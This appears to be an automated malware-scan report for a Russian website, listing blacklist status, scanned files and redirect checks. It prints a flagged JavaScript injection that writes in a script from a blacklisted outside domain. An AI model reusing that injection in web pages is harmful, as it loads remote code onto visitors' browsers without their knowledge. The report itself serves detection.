Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=shinshinych.ru
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://shinshinych.ru/
Result: The website is marked by Yandex as SMS-fraud resource. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Yandex as SMS-fraud resource. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://shinshinych.ru/ | 200 ok Content-Length: 47881 Content-Type: text/html | clean |
http://shinshinych.ru/script.js | 200 ok Content-Length: 1422 Content-Type: text/plain | clean |
http://shinshinych.ru/test404page.js | 404 not found Content-Length: 196 Content-Type: text/html | clean |
http://shinshinych.ru/nih105.js?PHPSESSID=7368696e7368696e7738687060736861 | 200 ok Content-Length: 532 Content-Type: text/plain | suspicious |
Page code contains blacklisted domain: yourmine.ru document.writeln('<scri'+'pt src="http://yourmine.ru/cgi-bin/mr.cgi"></scri'+'pt>');document.writeln('<scr'+'ipt type="text/javascript">var _paq = _paq || [];_paq.push(["trackPageView"]);_paq.push(["enableLinkTracking"]);(function() {var u="/piwik/";_paq.push(["setTrackerUrl", u+"piwik.php"]);_paq.push(["setSiteId", "?"]);var d=document, g=d.createElement("script"), s=d.getElementsByTagName("script")[0]; g.type="text/javascript";g.defer=true; g.async=true; g.src=u+"piwik.js"; s.parentNode.insertBefore(g,s);})();</sc'+'ript>'); | ||
http://shinshinych.ru/his105.js?PHPSESSID=7368696e7368696e7728687090736861 | 200 ok Content-Length: 292 Content-Type: text/plain | clean |
http://pagead2.googlesyndication.com/pagead/show_ads.js | 200 OK Content-Length: 21183 Content-Type: text/javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: shinshinych.ru
Result:
HTTP/1.1 200 ok
Cache-Control: max-age=0
Connection: close
Date: Fri, 22 Aug 2014 03:02:25 GMT
Server: nginx/1.2.0
Content-Length: 47881
Content-Type: text/html; charset=utf-8
Expires: Fri, 22 Aug 2014 03:02:25 GMT
...47881 bytes of data.
GET / HTTP/1.1
Host: shinshinych.ru
Result:
HTTP/1.1 200 ok
Cache-Control: max-age=0
Connection: close
Date: Fri, 22 Aug 2014 03:02:25 GMT
Server: nginx/1.2.0
Content-Length: 47881
Content-Type: text/html; charset=utf-8
Expires: Fri, 22 Aug 2014 03:02:25 GMT
...47881 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: shinshinych.ru
Referer: http://www.google.com/search?q=shinshinych.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: shinshinych.ru
Referer: http://www.google.com/search?q=shinshinych.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.